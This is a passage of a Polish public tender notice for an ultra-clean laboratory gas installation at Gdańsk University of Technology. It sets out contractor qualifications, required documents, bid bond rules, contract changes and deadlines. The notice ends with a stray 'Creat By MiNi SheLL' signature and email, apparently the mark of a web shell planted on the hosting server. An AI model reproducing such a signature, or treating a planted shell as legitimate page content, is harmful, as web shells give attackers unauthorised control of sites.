działalności jest krótszy - w tym okresie min. 1 <br/> robotę budowlaną polegającą na wykonaniu ultraczystej laboratoryjnej instalacji <br/> dystrybucji gazów o wartości nie mniejszej niż. 270 000,00 złotych brutto.<br/><br/> 2) dysponuje lub będzie dysponował następującymi osobami skierowanymi do realizacji <br/> zamówienia:<br/> a) osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności <br/> konstrukcyjno-budowlanej w nieograniczonym zakresie<br/> b) osobą posiadającą uprawnienia budowlane do kierowania robotami <br/> budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i <br/> urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i <br/> kanalizacyjnych w nieograniczonym zakresie<br/> c) osobą posiadającą uprawnienia budowlane do kierowania robotami <br/> budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i <br/> urządzeń elektrycznych i elektroenergetycznych w nieograniczonym zakresie <br/><br/> W przypadku warunku zdolności zawodowej, w zakresie dysponowania osobami <br/> skierowanymi przez wykonawcę do realizacji zamówienia publicznego, <br/> odpowiedzialnych za kierowanie robotami budowlanymi, zamawiający uznaje <br/> wymagane uprawnienia do kierowania robotami budowlanymi określone w <br/> rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 06 maja 2019 r. w sprawie <br/> samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) oraz <br/> uprawnienia obowiązujące wydane na podstawie wcześniej obowiązujących <br/> przepisów prawnych. Zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo <br/> budowlane (Dz.U.2021 poz. 2351 ze zm.), zamawiający uznaje również <br/> wymagane uprawnienia budowlane do kierowania robotami budowlanymi nabyte w <br/> innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, <br/> państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – <br/> stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, <br/> na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania <br/> kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej <br/> (Dz.U.2021.1646 t. j. z dnia 2021.09.08)<br/><br/> 2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub <br/> kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego <br/> zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych lub <br/> sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie <br/> od charakteru prawnego łączących go z nimi stosunków prawnych.<br/><br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających <br/> zasoby, jeśli podmioty te wykonają usługi lub roboty budowlane, do realizacji których te <br/> zdolności są wymagane.<br/><br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających <br/> zasoby, składa wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo <br/> odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania <br/> mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub <br/> inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując <br/> zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/><br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4 potwierdza, <br/> że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje <br/> rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/><br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/> 6. Zamawiający ocenia, czy udostępnione Wykonawcy przez podmioty udostępniające <br/> zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub <br/> ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału <br/> w postępowaniu, o których mowa w art. 112 ust. 3 i 4 oraz, jeżeli to dotyczy kryteriów <br/> selekcji, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, <br/> które zostały przewidziane względem wykonawcy.<br/><br/> 7. Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z <br/> wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę <br/> poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, <br/> chyba, że za nieudostępnienie tych zasobów podmiot ten nie ponosi winy.<br/><br/> 8. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa <br/> podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę <br/> warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy <br/> wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez <br/> zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że <br/> samodzielnie spełnia warunki udziału w postępowaniu.<br/><br/> 9. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności <br/> lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie <br/> polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających <br/> zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/> <br/> 1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i <br/> 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub <br/> wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o <br/> przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/> informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub <br/> wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego <br/> wykonawcy należącego do tej samej grupy kapitałowej; <br/><br/> 2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/> Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli <br/> przepisy wymagają wpisu do rejestru lub ewidencji; <br/><br/>2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w ust. 1 pkt. 2 Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3.	Zgodnie z art. 274 ust. 1 ustawy Pzp, przed wyborem najkorzystniejszej oferty zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych o których mowa w rozdziale IX pkt. 1 i rozdziale X.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia warunków udziału w postępowaniu zamawiający żąda:<br/> a) wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/> okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz <br/> podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów <br/> określających, czy te roboty budowlane zostały wykonane należycie, przy czym <br/> dowodami , o których mowa , są referencje bądź inne dokumenty sporządzone przez <br/> podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z <br/> przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne <br/> odpowiednie dokumenty – wzór wykazu stanowi Załącznik nr 4 do SWZ<br/><br/> b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/> w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub <br/> kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/> zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania <br/> zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/> informacją o podstawie do dysponowania tymi osobami – wzór wykazu stanowi <br/> Załącznik nr 5 do SWZ.<br/><br/> 2. Okres wyrażony w latach, o którym mowa w ust. 1 lit. a), liczy się wstecz od dnia, <br/> w którym upływa termin składania ofert.<br/><br/> 3. Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, <br/> wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w ust. 1 lit. a) <br/> dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio <br/> uczestniczył.<br/><br/> 4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/> polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do <br/> realizacji których te zdolności są wymagane (art. 117 ust. 3 Pzp).<br/><br/> 5. W przypadku, o którym mowa w ust. 4, wykonawcy wspólnie ubiegający się o udzielenie <br/> zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty <br/> budowlane wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi <br/> Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych w postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 Pzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby – sporządzone zgodnie z wzorem w Załączniku2a do SWZ.<br/>2.W przypadku wykonawców składających ofertę wspólną - Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy – w przypadku wspólnego ubiegania się o zamówienie przez wykonawców. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>4. Oryginał gwarancji lub poręczenia, w postaci elektronicznej - jeżeli wadium<br/>jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art.<br/>97 ust. 7 pkt 2-4 Pzp,<br/>5. Pełnomocnictwo – jeżeli dotyczy<br/>6. Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 Pzp, przedstawienia podmiotowych środków dowodowych, o których mowa w rozdziale X ust. 1, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w kwocie 8 000,00 zł ( słownie: osiem tysięcy złotych 00/100). 2.	Zgodnie z art. 97 ust. 7 pkt 2-4 Pzp wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu; 2)	gwarancjach bankowych; 3)	gwarancjach ubezpieczeniowych; 4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). 3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 91 1240 6292 1111 0011 0582 9419. Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez zamawiającego nastąpi przed upływem terminu składania ofert). 4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego – Zaprojektowanie i wykonanie ultraczystej, laboratoryjnej instalacji dystrybucji gazów specjalnych w laboratoriach nr 23 i 055 w budynku A Wydziału ETI PG. Oznaczenie sprawy: CRZP/52/009/R/23”<br/>6.	Za zgodą zamawiającego wykonawca może dokonać zmiany formy wadium na jedną lub kilka form, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp. Zmiana formy wadium musi być dokonana z zachowa¬niem ciągłości zabezpieczenia oferty kwotą wadium. 7.	Zgodnie z art. 96 ust. 6 Pzp zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli: 1)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej; 2)	wykonawca, którego oferta została wybrana: a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana.<br/>8.	Z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie zamawiającego, zobowiązanie gwaranta lub poręczyciela do zapłaty na rzecz zamawiającego kwoty określonej w gwarancji lub poręczeniu, w okolicznościach, o których mowa w art. 98 ust. 6 Pzp, 9.Gwarancje i poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp podlegać muszą prawu polskiemu. Wszystkie spory dotyczące gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp będą rozstrzygane zgodnie z prawem polskim przez sądy polskie. <br/>Szczegółowe informacje nt wadium zawarte zostały w rozdziale XXIX SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, a oferta taka <br/> spełniać musi następujące wymagania:<br/> 1) Wykonawcy muszą ustanowić Pełnomocnika do reprezentowania ich w <br/> postępowaniu o udzielenie zamówienia albo do reprezentowania ich w <br/> postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/> 2) Wypełniając Formularz oferty, oraz inne dokumenty powołujące się na wykonawcę <br/> w miejscu np. „nazwa i adres wykonawcy” należy wpisać dane wykonawców <br/> wspólnie ubiegających się o zamówienie.<br/><br/> 3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie <br/> odpowiadają za podpisanie i wykonanie umowy.<br/><br/> 4) W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z <br/> Pełnomocnikiem wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/><br/> 5) Przed podpisaniem umowy, wykonawcy składający ofertę wspólną będą mieli <br/> obowiązek przedstawić kopię umowy regulującej ich współpracę.<br/><br/> 6) W odniesieniu do wymagań każdy wykonawca składający ofertę wspólną musi <br/> udokumentować, że nie podlega wykluczeniu oraz spełnia warunki udziału w <br/> postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie <br/> warunków udziału w postępowaniu.<br/><br/> 7) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/> lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/> mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty <br/> budowlane, do realizacji których te zdolności są wymagane.<br/><br/> 8) W przypadku, o którym mowa w pkt. 7, wykonawcy wspólnie ubiegający <br/> się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego <br/> wynika, które roboty budowlane wykonają poszczególni wykonawcy - Wzór <br/> oświadczenia stanowi załącznik nr 7 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Każda zmiana umowy wymaga formy pisemnej pod rygorem nieważności.<br/> 2. Umowa może ulec zmianie na zasadach, o których mowa w art. 454 i 455 ustawy PZP, a <br/> nadto w okolicznościach określonych poniżej.<br/> 3. Strony mogą zmienić Umowę w zakresie terminu wykonania Umowy w razie:<br/>a.	wstrzymania lub opóźnienia realizacji robót wskutek siły wyższej – o czas, w którym siła wyższa wstrzymała lub opóźniła realizację robót<br/>b.	konieczności wykonania robót/prac dodatkowych lub zamiennych – o czas konieczny na wykonanie tych robót/prac<br/>c.	przestojów spowodowanych wyłącznie przez Zamawiającego lub inne niż Wykonawca osoby lub podmioty, za których działania lub zaniechanie Wykonawca nie ponosi odpowiedzialności – o czas oczekiwania na czynność Zamawiającego, wskazanych osób lub podmiotów umożliwiającą zakończenie przestoju,<br/>d.	wydania odnoszących się do Przedmiotu Umowy decyzji administracyjnych lub wyroków sądowych lub innych władczych rozstrzygnięć uprawnionych organów lub toczących się ponad terminy ustawowe lub pierwotnie zakładane postępowań administracyjnych lub innego rodzaju procedur odnoszących się do Przedmiotu Umowy, w tym procedur Zamawiającego – o czas wstrzymania lub przedłużenia realizacji Umowy wynikającej z tych okoliczności,<br/>e.	przestojów spowodowanych koniecznością usuwania nieumyślnych uszkodzeń lub kolizji istniejących urządzeń podziemnych, nieoznaczonych lub błędnie oznaczonych w dokumentacji projektowej - odpowiednio o liczbę dni wstrzymania realizacji umowy wynikającej z tych okoliczności,<br/><br/>	4. Niezależnie od uprawnień wynikających z ustawy PZP strony mogą zmienić Umowę w <br/> zakresie wysokości wynagrodzenia Wykonawcy lub zasad płatności tego wynagrodzenia w <br/> razie konieczności wykonania robót/prac dodatkowych lub zamiennych, których <br/> konieczność wykonania ujawniła się w toku prowadzenia robót/prac i konieczność ich <br/> wykonania nie dała się przewidzieć przed złożeniem oferty z uwzględnieniem staranności <br/> wymaganej od doświadczonego wykonawcy. Ustalenie zakresu i wartości zmiany następuje <br/> w Protokole Konieczności zgodnie z postanowieniami Umowy oraz w razie takiej <br/> konieczności w Protokole z Negocjacji.<br/>	<br/> 5. Każda zmiana umowy wymaga zgody drugiej strony, z zastrzeżeniem odmiennych <br/> postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć drogą elektroniczną za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/pg_edu/proceedings na stronie dotyczącej przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-24 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Stosownie do brzmienia art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. nr 835), z postępowania wyklucza się: <br/> 1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 <br/> i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w <br/> sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w <br/> art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. (Dz.U. z 2022 r. poz. 835);<br/> 2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 <br/> marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu <br/> (Dz.U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych <br/> w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub <br/> będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile <br/> została wpisana na listę na podstawie decyzji w sprawie wpisu na listę <br/> rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z <br/> dnia 13 kwietnia 2022 r. (Dz.U. z 2022 r. poz. 835);<br/> 3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 <br/> ustawy z dnia 29 września 1994 r. o rachunkowości (Dz.U. z 2021 r. poz. 217, <br/> 2105 i 2106) jest podmiot wymieniony w wykazach określonych w <br/> rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub <br/> będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany <br/> na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o <br/> zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia <br/> 2022 r. (Dz.U. z 2022 r. poz. 835);<br/>Wykluczenie następuje na okres trwania okoliczności wymienionych powyżej.<br/>2. Dodatkowe info do: SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA , pkt. 3.6<br/>Ofertę należy złożyć: a) w formie elektronicznej (tj. z kwalifikowanym podpisem elektronicznym)<br/>lub b) w postaci elektronicznej opatrzonej podpisem zaufanym lub c) w postaci elektronicznej<br/>opatrzonej podpisem osobistym podpisaną przez osobę upoważnioną za pośrednictwem<br/>https://platformazakupowa.pl/pn/pg_edu.<br/>Szczegóły zawiera rozdział XVI i XIX SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com